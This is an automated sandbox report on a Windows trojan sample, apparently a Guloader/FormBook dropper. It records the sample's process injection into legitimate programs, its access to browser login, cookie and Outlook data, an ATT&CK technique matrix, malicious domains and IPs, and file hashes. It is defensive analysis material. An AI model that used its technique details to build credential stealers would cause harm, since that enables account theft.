            Source: C:\Users\user\Desktop\Document_084462.scr.exeCode function: 1_2_37AB91E5 mov eax, dword ptr fs:[00000030h]1_2_37AB91E5
            Source: C:\Users\user\Desktop\Document_084462.scr.exeCode function: 1_2_37AB91E5 mov eax, dword ptr fs:[00000030h]1_2_37AB91E5
            Source: C:\Users\user\Desktop\Document_084462.scr.exeCode function: 1_2_37AA91F0 mov eax, dword ptr fs:[00000030h]1_2_37AA91F0
            Source: C:\Users\user\Desktop\Document_084462.scr.exeCode function: 1_2_37AA91F0 mov eax, dword ptr fs:[00000030h]1_2_37AA91F0
            Source: C:\Users\user\Desktop\Document_084462.scr.exeCode function: 1_2_37ADF1F0 mov eax, dword ptr fs:[00000030h]1_2_37ADF1F0
            Source: C:\Users\user\Desktop\Document_084462.scr.exeCode function: 1_2_37ADF1F0 mov eax, dword ptr fs:[00000030h]1_2_37ADF1F0
            Source: C:\Users\user\Desktop\Document_084462.scr.exeCode function: 1_2_37AC51C0 mov eax, dword ptr fs:[00000030h]1_2_37AC51C0
            Source: C:\Users\user\Desktop\Document_084462.scr.exeCode function: 1_2_37AC51C0 mov eax, dword ptr fs:[00000030h]1_2_37AC51C0
            Source: C:\Users\user\Desktop\Document_084462.scr.exeCode function: 1_2_37AC51C0 mov eax, dword ptr fs:[00000030h]1_2_37AC51C0
            Source: C:\Users\user\Desktop\Document_084462.scr.exeCode function: 1_2_37AC51C0 mov eax, dword ptr fs:[00000030h]1_2_37AC51C0
            Source: C:\Users\user\Desktop\Document_084462.scr.exeCode function: 1_2_37AE7128 mov eax, dword ptr fs:[00000030h]1_2_37AE7128
            Source: C:\Users\user\Desktop\Document_084462.scr.exeCode function: 1_2_37AE7128 mov eax, dword ptr fs:[00000030h]1_2_37AE7128
            Source: C:\Users\user\Desktop\Document_084462.scr.exeCode function: 1_2_37B6F13E mov eax, dword ptr fs:[00000030h]1_2_37B6F13E
            Source: C:\Users\user\Desktop\Document_084462.scr.exeCode function: 1_2_37AD510F mov eax, dword ptr fs:[00000030h]1_2_37AD510F
            Source: C:\Users\user\Desktop\Document_084462.scr.exeCode function: 1_2_37AD510F mov eax, dword ptr fs:[00000030h]1_2_37AD510F
            Source: C:\Users\user\Desktop\Document_084462.scr.exeCode function: 1_2_37AD510F mov eax, dword ptr fs:[00000030h]1_2_37AD510F
            Source: C:\Users\user\Desktop\Document_084462.scr.exeCode function: 1_2_37AD510F mov eax, dword ptr fs:[00000030h]1_2_37AD510F
            Source: C:\Users\user\Desktop\Document_084462.scr.exeCode function: 1_2_37AD510F mov eax, dword ptr fs:[00000030h]1_2_37AD510F
            Source: C:\Users\user\Desktop\Document_084462.scr.exeCode function: 1_2_37AD510F mov eax, dword ptr fs:[00000030h]1_2_37AD510F
            Source: C:\Users\user\Desktop\Document_084462.scr.exeCode function: 1_2_37AD510F mov eax, dword ptr fs:[00000030h]1_2_37AD510F
            Source: C:\Users\user\Desktop\Document_084462.scr.exeCode function: 1_2_37AD510F mov eax, dword ptr fs:[00000030h]1_2_37AD510F
            Source: C:\Users\user\Desktop\Document_084462.scr.exeCode function: 1_2_37AD510F mov eax, dword ptr fs:[00000030h]1_2_37AD510F
            Source: C:\Users\user\Desktop\Document_084462.scr.exeCode function: 1_2_37AD510F mov eax, dword ptr fs:[00000030h]1_2_37AD510F
            Source: C:\Users\user\Desktop\Document_084462.scr.exeCode function: 1_2_37AD510F mov eax, dword ptr fs:[00000030h]1_2_37AD510F
            Source: C:\Users\user\Desktop\Document_084462.scr.exeCode function: 1_2_37AD510F mov eax, dword ptr fs:[00000030h]1_2_37AD510F
            Source: C:\Users\user\Desktop\Document_084462.scr.exeCode function: 1_2_37AD510F mov eax, dword ptr fs:[00000030h]1_2_37AD510F
            Source: C:\Users\user\Desktop\Document_084462.scr.exeCode function: 1_2_37AB510D mov eax, dword ptr fs:[00000030h]1_2_37AB510D
            Source: C:\Users\user\Desktop\Document_084462.scr.exeCode function: 1_2_37AAF113 mov eax, dword ptr fs:[00000030h]1_2_37AAF113
            Source: C:\Users\user\Desktop\Document_084462.scr.exeCode function: 1_2_37AAF113 mov eax, dword ptr fs:[00000030h]1_2_37AAF113
            Source: C:\Users\user\Desktop\Document_084462.scr.exeCode function: 1_2_37AAF113 mov eax, dword ptr fs:[00000030h]1_2_37AAF113
            Source: C:\Users\user\Desktop\Document_084462.scr.exeCode function: 1_2_37AAF113 mov eax, dword ptr fs:[00000030h]1_2_37AAF113
            Source: C:\Users\user\Desktop\Document_084462.scr.exeCode function: 1_2_37AAF113 mov eax, dword ptr fs:[00000030h]1_2_37AAF113
            Source: C:\Users\user\Desktop\Document_084462.scr.exeCode function: 1_2_37AAF113 mov eax, dword ptr fs:[00000030h]1_2_37AAF113
            Source: C:\Users\user\Desktop\Document_084462.scr.exeCode function: 1_2_37AAF113 mov eax, dword ptr fs:[00000030h]1_2_37AAF113
            Source: C:\Users\user\Desktop\Document_084462.scr.exeCode function: 1_2_37AAF113 mov eax, dword ptr fs:[00000030h]1_2_37AAF113
            Source: C:\Users\user\Desktop\Document_084462.scr.exeCode function: 1_2_37AAF113 mov eax, dword ptr fs:[00000030h]1_2_37AAF113
            Source: C:\Users\user\Desktop\Document_084462.scr.exeCode function: 1_2_37AAF113 mov eax, dword ptr fs:[00000030h]1_2_37AAF113
            Source: C:\Users\user\Desktop\Document_084462.scr.exeCode function: 1_2_37AAF113 mov eax, dword ptr fs:[00000030h]1_2_37AAF113
            Source: C:\Users\user\Desktop\Document_084462.scr.exeCode function: 1_2_37AAF113 mov eax, dword ptr fs:[00000030h]1_2_37AAF113
            Source: C:\Users\user\Desktop\Document_084462.scr.exeCode function: 1_2_37AAF113 mov eax, dword ptr fs:[00000030h]1_2_37AAF113
            Source: C:\Users\user\Desktop\Document_084462.scr.exeCode function: 1_2_37AAF113 mov eax, dword ptr fs:[00000030h]1_2_37AAF113
            Source: C:\Users\user\Desktop\Document_084462.scr.exeCode function: 1_2_37AAF113 mov eax, dword ptr fs:[00000030h]1_2_37AAF113
            Source: C:\Users\user\Desktop\Document_084462.scr.exeCode function: 1_2_37AAF113 mov eax, dword ptr fs:[00000030h]1_2_37AAF113
            Source: C:\Users\user\Desktop\Document_084462.scr.exeCode function: 1_2_37AAF113 mov eax, dword ptr fs:[00000030h]1_2_37AAF113
            Source: C:\Users\user\Desktop\Document_084462.scr.exeCode function: 1_2_37AAF113 mov eax, dword ptr fs:[00000030h]1_2_37AAF113
            Source: C:\Users\user\Desktop\Document_084462.scr.exeCode function: 1_2_37AAF113 mov eax, dword ptr fs:[00000030h]1_2_37AAF113
            HIPS / PFW / Operating System Protection Evasion

            Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe | NtDeviceIoControlFile: Direct from: 0x34F0721
            Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe | NtCreateThreadEx: Direct from: 0x34E7AA4
            Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe | NtProtectVirtualMemory: Direct from: 0x34F1BA4
            Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe | NtResumeThread: Direct from: 0x601D676
            Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe | NtDelayExecution: Direct from: 0x601D430
            Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe | NtDeviceIoControlFile: Direct from: 0x34E94B7
            Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe | NtProtectVirtualMemory: Direct from: 0x34F052E
            Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe | NtClose: Direct from: 0x7FFC812F9E7F
            Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe | NtDeviceIoControlFile: Direct from: 0x34E94FB
            Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe | NtDelayExecution: Direct from: 0x34E7247
            Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe | NtDeviceIoControlFile: Direct from: 0x34E9488
            Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe | NtQueryInformationToken: Direct from: 0x34E8DE7
            Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe | NtQuerySystemInformation: Direct from: 0x34F05CA
            Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe | NtDelayExecution: Direct from: 0x601D5FF
            Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe | NtDeviceIoControlFile: Direct from: 0x34F0679
            Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe | NtProtectVirtualMemory: Direct from: 0x7FFCB7602651
            Source: C:\Users\user\Desktop\Document_084462.scr.exe | NtQueueApcThread: Indirect: 0x12F5BB
            Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe | NtDelayExecution: Direct from: 0x34E86B2
            Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe | NtDelayExecution: Direct from: 0x34E93C9
            Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe | NtProtectVirtualMemory: Direct from: 0x602524D
            Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe | NtClose: Direct from: 0x34F07AF
            Source: C:\Users\user\Desktop\Document_084462.scr.exe | NtSuspendThread: Indirect: 0x133B19
            Source: C:\Users\user\Desktop\Document_084462.scr.exe | NtSetContextThread: Indirect: 0x1337F9
            Source: C:\Users\user\Desktop\Document_084462.scr.exe | NtResumeThread: Indirect: 0x133E39
            Source: C:\Users\user\Desktop\Document_084462.scr.exe | Section loaded: NULL target: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe protection: execute and read and write
            Source: C:\Users\user\Desktop\Document_084462.scr.exe | Section loaded: NULL target: C:\Windows\SysWOW64\waitfor.exe protection: execute and read and write
            Source: C:\Windows\SysWOW64\waitfor.exe | Section loaded: NULL target: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe protection: read write
            Source: C:\Windows\SysWOW64\waitfor.exe | Section loaded: NULL target: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe protection: execute and read and write
            Source: C:\Windows\SysWOW64\waitfor.exe | Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read write
            Source: C:\Windows\SysWOW64\waitfor.exe | Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and write
            Source: C:\Users\user\Desktop\Document_084462.scr.exe | Thread register set: target process: 7608
            Source: C:\Windows\SysWOW64\waitfor.exe | Thread register set: target process: 7608
            Source: C:\Windows\SysWOW64\waitfor.exe | Thread register set: target process: 6276
            Source: C:\Users\user\Desktop\Document_084462.scr.exe | Thread APC queued: target process: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
            Source: C:\Users\user\Desktop\Document_084462.scr.exe | Process created: C:\Users\user\Desktop\Document_084462.scr.exe "C:\Users\user\Desktop\Document_084462.scr.exe"
            Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe | Process created: C:\Windows\SysWOW64\waitfor.exe "C:\Windows\SysWOW64\waitfor.exe"
            Source: C:\Windows\SysWOW64\waitfor.exe | Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
            Source: C:\Users\user\Desktop\Document_084462.scr.exe | Code function: 0_2_004034A2 EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,OleUninitialize,ExitProcess,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,LdrInitializeThunk,CopyFileW,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess

            Stealing of Sensitive Information

            Source: Yara match | File source: 00000003.00000002.16927455279.00000000048A0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000001.00000002.13274732696.0000000000150000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000003.00000002.16927359269.0000000004850000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: C:\Windows\SysWOW64\waitfor.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
            Source: C:\Windows\SysWOW64\waitfor.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
            Source: C:\Windows\SysWOW64\waitfor.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
            Source: C:\Windows\SysWOW64\waitfor.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
            Source: C:\Windows\SysWOW64\waitfor.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies
            Source: C:\Windows\SysWOW64\waitfor.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local State
            Source: C:\Windows\SysWOW64\waitfor.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local State
            Source: C:\Windows\SysWOW64\waitfor.exe | Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\

            Remote Access Functionality

            Source: Yara match | File source: 00000003.00000002.16927455279.00000000048A0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000001.00000002.13274732696.0000000000150000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000003.00000002.16927359269.0000000004850000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

            | Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact |
            |---|---|---|---|---|---|---|---|---|---|---|---|---|---|
            | Gather Victim Identity Information | Acquire Infrastructure | Valid Accounts | 1 Native API | 1 Registry Run Keys / Startup Folder | 1 Access Token Manipulation | 1 Masquerading | 1 OS Credential Dumping | 321 Security Software Discovery | Remote Services | 1 Email Collection | 11 Encrypted Channel | Exfiltration Over Other Network Medium | 1 System Shutdown/Reboot |
            | Credentials | Domains | Default Accounts | Scheduled Task/Job | 1 DLL Side-Loading | 311 Process Injection | 12 Virtualization/Sandbox Evasion | LSASS Memory | 12 Virtualization/Sandbox Evasion | Remote Desktop Protocol | 1 Archive Collected Data | 4 Ingress Tool Transfer | Exfiltration Over Bluetooth | Network Denial of Service |
            | Email Addresses | DNS Server | Domain Accounts | At | Logon Script (Windows) | 1 Abuse Elevation Control Mechanism | 1 Access Token Manipulation | Security Account Manager | 1 Process Discovery | SMB/Windows Admin Shares | 1 Data from Local System | 5 Non-Application Layer Protocol | Automated Exfiltration | Data Encrypted for Impact |
            | Employee Names | Virtual Private Server | Local Accounts | Cron | Login Hook | 1 Registry Run Keys / Startup Folder | 311 Process Injection | NTDS | 1 Application Window Discovery | Distributed Component Object Model | 1 Clipboard Data | 6 Application Layer Protocol | Traffic Duplication | Data Destruction |
            | Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | 1 DLL Side-Loading | 1 Deobfuscate/Decode Files or Information | LSA Secrets | 2 File and Directory Discovery | SSH | Keylogging | Fallback Channels | Scheduled Transfer | Data Encrypted for Impact |
            | Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | RC Scripts | 1 Abuse Elevation Control Mechanism | Cached Domain Credentials | 14 System Information Discovery | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop |
            | DNS | Web Services | External Remote Services | Systemd Timers | Startup Items | Startup Items | 3 Obfuscated Files or Information | DCSync | Remote System Discovery | Windows Remote Management | Web Portal Capture | Commonly Used Port | Exfiltration Over C2 Channel | Inhibit System Recovery |
            | Network Trust Dependencies | Serverless | Drive-by Compromise | Container Orchestration Job | Scheduled Task/Job | Scheduled Task/Job | 1 DLL Side-Loading | Proc Filesystem | System Owner/User Discovery | Cloud Services | Credential API Hooking | Application Layer Protocol | Exfiltration Over Alternative Protocol | Defacement |

            [Behavior graph (ID 1567687): sample Document_084462.scr.exe, start date 03/12/2024, architecture WINDOWS, score 100. Process chain: Document_084462.scr.exe (started) -> Document_084462.scr.exe (started) -> RAVCpl64.exe (injected) -> waitfor.exe (started) -> firefox.exe (started).]

            Source | Detection | Scanner | Label | Link
            Document_084462.scr.exe | 34% | ReversingLabs | Win32.Trojan.Guloader
            Document_084462.scr.exe | 100% | Joe Sandbox ML
            Source | Detection | Scanner | Label | Link
            C:\Users\user\AppData\Local\Temp\nsqE4B5.tmp\System.dll | 0% | ReversingLabs
            No Antivirus matches
            No Antivirus matches
            Source | Detection | Scanner | Label | Link
            Name | IP | Active | Malicious | Antivirus Detection | Reputation
            Name | Malicious | Antivirus Detection | Reputation
            Name | Source | Malicious | Antivirus Detection | Reputation
            IP | Domain | Country | Flag | ASN | ASN Name | Malicious
                                                          Joe Sandbox version:41.0.0 Charoite
                                                          Analysis ID:1567687
                                                          Start date and time:2024-12-03 18:51:21 +01:00
                                                          Joe Sandbox product:CloudBasic
                                                          Overall analysis duration:0h 17m 9s
                                                          Hypervisor based Inspection enabled:false
                                                          Report type:full
                                                          Cookbook file name:default.jbs
                                                          Analysis system description:Windows 10 64 bit 20H2 Native physical Machine for testing VM-aware malware (Office 2019, Chrome 128, Firefox 91, Adobe Reader DC 21, Java 8 Update 301
                                                          Run name:Suspected Instruction Hammering
                                                          Number of analysed new started processes analysed:4
                                                          Number of new started drivers analysed:0
                                                          Number of existing processes analysed:0
                                                          Number of existing drivers analysed:0
                                                          Number of injected processes analysed:1
                                                          Technologies:
                                                          • HCA enabled
                                                          • EGA enabled
                                                          • AMSI enabled
                                                          Analysis Mode:default
                                                          Sample name:Document_084462.scr.exe
                                                          Detection:MAL
                                                          Classification:mal100.troj.spyw.evad.winEXE@7/6@19/15
                                                          EGA Information:
                                                          • Successful, ratio: 100%
                                                          HCA Information:
                                                          • Successful, ratio: 86%
                                                          • Number of executed functions: 70
                                                          • Number of non-executed functions: 293
                                                          Cookbook Comments:
                                                          • Found application associated with file extension: .exe
                                                          • Sleeps bigger than 100000000ms are automatically reduced to 1000ms
                                                          • Report creation exceeded maximum time and may have missing disassembly code information.
                                                          • Report size exceeded maximum capacity and may have missing behavior information.
                                                          • Report size getting too big, too many NtOpenKeyEx calls found.
                                                          • Report size getting too big, too many NtQueryValueKey calls found.
                                                          • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                          • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                          • VT rate limit hit for: Document_084462.scr.exe
            Time | Type | Description
            12:55:17 | API Interceptor | 22068113x Sleep call for process: waitfor.exe modified
            Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
            Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
                                                          www.optimismbank.xyzProforma invoice - Arancia NZ.exeGet hashmaliciousFormBookBrowse
                                                          • 13.248.169.48
                                                          PAYROLL LIST.exeGet hashmaliciousFormBookBrowse
                                                          • 13.248.169.48
                                                          SWIFT COPY 0028_pdf.exeGet hashmaliciousFormBookBrowse
                                                          • 13.248.169.48
                                                          www.xcvbj.asiaProforma invoice - Arancia NZ.exeGet hashmaliciousFormBookBrowse
                                                          • 149.88.81.190
                                                          OUTSTANDING BALANCE PAYMENT.exeGet hashmaliciousFormBookBrowse
                                                          • 149.88.81.190
                                                          OUTSTANDING BALANCE PAYMENT.exeGet hashmaliciousFormBookBrowse
                                                          • 149.88.81.190
                                                          REQUESTING FOR UPDATED SOA.exeGet hashmaliciousFormBookBrowse
                                                          • 149.88.81.190
                                                          PAYROLL LIST.exeGet hashmaliciousFormBookBrowse
                                                          • 149.88.81.190
                                                          purchase Order.exeGet hashmaliciousFormBookBrowse
                                                          • 149.88.81.190
                                                          RFQ 3100185 MAHAD.exeGet hashmaliciousFormBookBrowse
                                                          • 149.88.81.190
                                                          www.bankseedz.infoProforma invoice - Arancia NZ.exeGet hashmaliciousFormBookBrowse
                                                          • 46.30.211.38
                                                          PAYROLL LIST.exeGet hashmaliciousFormBookBrowse
                                                          • 46.30.211.38
                                                          www.madhf.techNew Purchase Order.exeGet hashmaliciousFormBookBrowse
                                                          • 103.224.182.242
                                                          Purchase Order..exeGet hashmaliciousFormBookBrowse
                                                          • 103.224.182.242
                                                          YH-3-12-2024-GDL Units - Projects.exeGet hashmaliciousFormBookBrowse
                                                          • 103.224.182.242
                                                          Proforma invoice - Arancia NZ.exeGet hashmaliciousFormBookBrowse
                                                          • 103.224.182.242
                                                          Quotation Validity.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                          • 103.224.182.242
                                                          BASF Hung#U00e1ria Kft.exeGet hashmaliciousFormBookBrowse
                                                          • 15.204.67.7
                                                          Purchase Order PO.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                          • 103.224.182.242
                                                          Payment_Confirmation_pdf.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                          • 103.224.182.242
                                                          PAYROLL LIST.exeGet hashmaliciousFormBookBrowse
                                                          • 103.224.182.242
                                                          Purchase Order PO.exeGet hashmaliciousFormBookBrowse
                                                          • 103.224.182.242
                                                          r0lqcud7.nbnnn.xyzquotation.exeGet hashmaliciousFormBookBrowse
                                                          • 27.124.4.246
                                                          YH-3-12-2024-GDL Units - Projects.exeGet hashmaliciousFormBookBrowse
                                                          • 23.225.159.42
                                                          Proforma invoice - Arancia NZ.exeGet hashmaliciousFormBookBrowse
                                                          • 202.79.161.151
                                                          lKvXJ7VVCK.exeGet hashmaliciousFormBookBrowse
                                                          • 23.225.159.42
                                                          BASF Hung#U00e1ria Kft.exeGet hashmaliciousFormBookBrowse
                                                          • 27.124.4.246
                                                          specifications.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                          • 23.225.159.42
                                                          OUTSTANDING BALANCE PAYMENT.exeGet hashmaliciousFormBookBrowse
                                                          • 202.79.161.151
                                                          ARRIVAL NOTICE.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                          • 202.79.161.151
                                                          OUTSTANDING BALANCE PAYMENT.exeGet hashmaliciousFormBookBrowse
                                                          • 27.124.4.246
                                                          REQUESTING FOR UPDATED SOA.exeGet hashmaliciousFormBookBrowse
                                                          • 23.225.160.132
                                                                            Process:C:\Windows\SysWOW64\waitfor.exe
                                                                            File Type:SQLite 3.x database, last written using SQLite version 3036000, page size 2048, file counter 7, database pages 59, cookie 0x52, schema 4, UTF-8, version-valid-for 7
                                                                            Category:dropped
                                                                            Size (bytes):135168
                                                                            Entropy (8bit):1.1142956103012707
                                                                            Encrypted:false
                                                                            SSDEEP:192:8t4nKTjebGA7j9p/XH9eQ3KvphCNKRmquPWTPVusE6kvjd:8t4n/9p/39J6hwNKRmqu+7VusEtrd
                                                                            MD5:E3F9717F45BF5FFD0A761794A10A5BB5
                                                                            SHA1:EBD823E350F725F29A7DE7971CD35D8C9A5616CC
                                                                            SHA-256:D79535761C01E8372CCEB75F382E912990929624EEA5D7093A5A566BAE069C70
                                                                            SHA-512:F12D2C7B70E898ABEFA35FEBBDC28D264FCA071D66106AC83F8FC58F40578387858F364C838E69FE8FC66645190E1CB2B4B63791DDF77955A1C376424611A85D
                                                                            Malicious:false
                                                                            Reputation:moderate, very likely benign file
                                                                            Process:C:\Users\user\Desktop\Document_084462.scr.exe
                                                                            File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                            Category:dropped
                                                                            Size (bytes):12288
                                                                            Entropy (8bit):5.737556724687435
                                                                            Encrypted:false
                                                                            SSDEEP:192:MenY0qWTlt70IAj/lQ0sEWc/wtYbBH2aDybC7y+XBaIwL:M8+Qlt70Fj/lQRY/9VjjgL
                                                                            MD5:6E55A6E7C3FDBD244042EB15CB1EC739
                                                                            SHA1:070EA80E2192ABC42F358D47B276990B5FA285A9
                                                                            SHA-256:ACF90AB6F4EDC687E94AAF604D05E16E6CFB5E35873783B50C66F307A35C6506
                                                                            SHA-512:2D504B74DA38EDC967E3859733A2A9CACD885DB82F0CA69BFB66872E882707314C54238344D45945DC98BAE85772ACEEF71A741787922D640627D3C8AE8F1C35
                                                                            Malicious:false
                                                                            Antivirus:
                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                            Joe Sandbox View:
                                                                            • Filename: PO.exe, Detection: malicious
                                                                            • Filename: PO.exe, Detection: malicious
                                                                            • Filename: yuc1Jwlkh5.exe, Detection: malicious
                                                                            • Filename: yuc1Jwlkh5.exe, Detection: malicious
                                                                            • Filename: IMAGE000Pdf.exe, Detection: malicious
                                                                            • Filename: stormskridtets.exe, Detection: malicious
                                                                            • Filename: IMAGE000Pdf.exe, Detection: malicious
                                                                            • Filename: orders_PI 008-01.exe, Detection: malicious
                                                                            • Filename: RemotePCViewer.exe, Detection: malicious
                                                                            Reputation:moderate, very likely benign file
                                                                            Process:C:\Users\user\Desktop\Document_084462.scr.exe
                                                                            File Type:data
                                                                            Category:dropped
                                                                            Size (bytes):304925
                                                                            Entropy (8bit):7.634681653349571
                                                                            Encrypted:false
                                                                            SSDEEP:6144:xIzwYKF20lQ11epuJK247DJXcttrow2pc7pIiZrFP0B:xIzw0mj5t7q3sw2pc7eiZrFM
                                                                            MD5:441D2CEA6B12B330064FADB3BAAC31E4
                                                                            SHA1:3FAD8D74BFFB31012A1B22C682388D4DBA848040
                                                                            SHA-256:F10E813A698E1536AE7BFCDEC3479AD699D464378E786BB53B3566E3FDF13A76
                                                                            SHA-512:8B84C3FACBE9DC9C8821F00E896A920B6F8359A9C10A170456E94A6CE749C7184DBC0772C9553813BCD91EB72FE0046CC68D8194698ECA4A20A4F33011C27920
                                                                            Malicious:false
                                                                            Process:C:\Users\user\Desktop\Document_084462.scr.exe
                                                                            File Type:data
                                                                            Category:dropped
                                                                            Size (bytes):116773
                                                                            Entropy (8bit):1.2617404262864118
                                                                            Encrypted:false
                                                                            SSDEEP:768:4yTqkjNz46YyMqMTGZGi7vk59sktCQ3am6ZRN8rOFlS70dhEr:0avCLJ
                                                                            MD5:753C4F9B2F84095556E2C65E2569D814
                                                                            SHA1:3F878C44B311B8C34B2A6E09F49324D42FAD1437
                                                                            SHA-256:E6DCE06287ACEBCFB23DA58EAC6AAA36E253BADB493125F47E801B99C4E48B25
                                                                            SHA-512:8C19F357F4A59D5CB493F418C82B0D06ECED25EC9D05E9B1CFF943A6A79232DC6B2EBC3552B0BFBA76018A7FCEFE8A0410ADEE739151640F149884A4FC3DF651
                                                                            Malicious:false
                                                                            Process:C:\Users\user\Desktop\Document_084462.scr.exe
                                                                            File Type:data
                                                                            Category:dropped
                                                                            Size (bytes):222131
                                                                            Entropy (8bit):1.2548431305039245
                                                                            Encrypted:false
                                                                            SSDEEP:768:I2mmH3AhfHp+POGgRSRFZHl2bxYLbBjJ4tFGZjDyYqIx3x9+6yiKk+vlK5u5DF+G:UoNwkuoHtyiKJlQVD
                                                                            MD5:C018B5D87F38B0DBA90AFE75F72B6798
                                                                            SHA1:9B43AE84826B712BB8152D70D2D7B929DB5CE3E2
                                                                            SHA-256:323B7D5F0C7A4F9FA87D8F6DD9A18E81F4284C31DA4FDD5FFE7022501445FD1C
                                                                            SHA-512:D4D6A99EBA1F594BA4052F4C83C93946749EE7524D5765CFD67C0CD34BBA3F1ABBDEA259EBE155A3767898AAE806E29E42BE6539C4A2DC067730EC6D9655ECD5
                                                                            Malicious:false
                                                                            Process:C:\Users\user\Desktop\Document_084462.scr.exe
                                                                            File Type:data
                                                                            Category:dropped
                                                                            Size (bytes):477418
                                                                            Entropy (8bit):1.2516735777117096
                                                                            Encrypted:false
                                                                            SSDEEP:1536:BugSY71rrh1lxz0ZSyCjm0eydI6Vl73+ByRgN:F7Zrh4SvQy3SBGgN
                                                                            MD5:B86B0A4CFA46775BAEEE023CCECA54E1
                                                                            SHA1:16BABC347EBFC80762D73A12FF39E5ADE55EC7DB
                                                                            SHA-256:7B1E45A0398C8428C6CF476DAE264102A842FACC20930B57688960046FF087F6
                                                                            SHA-512:42787A7037E7D117D82AF3580306C7C10854B279CEC0B38956217B4E04222B34EAC50763B0DB850454DC0AA43B5238297D39FC8E5A681C805966E0BCCD4E7C0D
                                                                            Malicious:false
                                                                            File type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                                                                            Entropy (8bit):7.959977071883598
                                                                            TrID:
                                                                            • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                            • Generic Win/DOS Executable (2004/3) 0.02%
                                                                            • DOS Executable Generic (2002/1) 0.02%
                                                                            • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                            File name:Document_084462.scr.exe
                                                                            File size:456'022 bytes
                                                                            MD5:b4e362177a0e0836dd04831fe456255b
                                                                            SHA1:de7a47519e45386fd0b0f2ff4ab6fbdb5b81716e
                                                                            SHA256:0ccf347c204f022f6cf118c653ccb248e41cfc71593217b9ed5bfc7ef13fcbc7
                                                                            SHA512:fd3cb279c3211260afaffd7e1976231456fbd00cbec0bab95204740b64fc499d059688d609495bd6a87cd8df3fab9f9c8ddcf13c67b83e1ea38414080e8dc749
                                                                            SSDEEP:6144:B3hqLBhFuob3eN4CXo9l4z97QqPwTvOw+7P+cf1rr6USu1DG1FM1MYNTXW:B3UXhb0WlO97QqP0Odmcf1KUS0zT
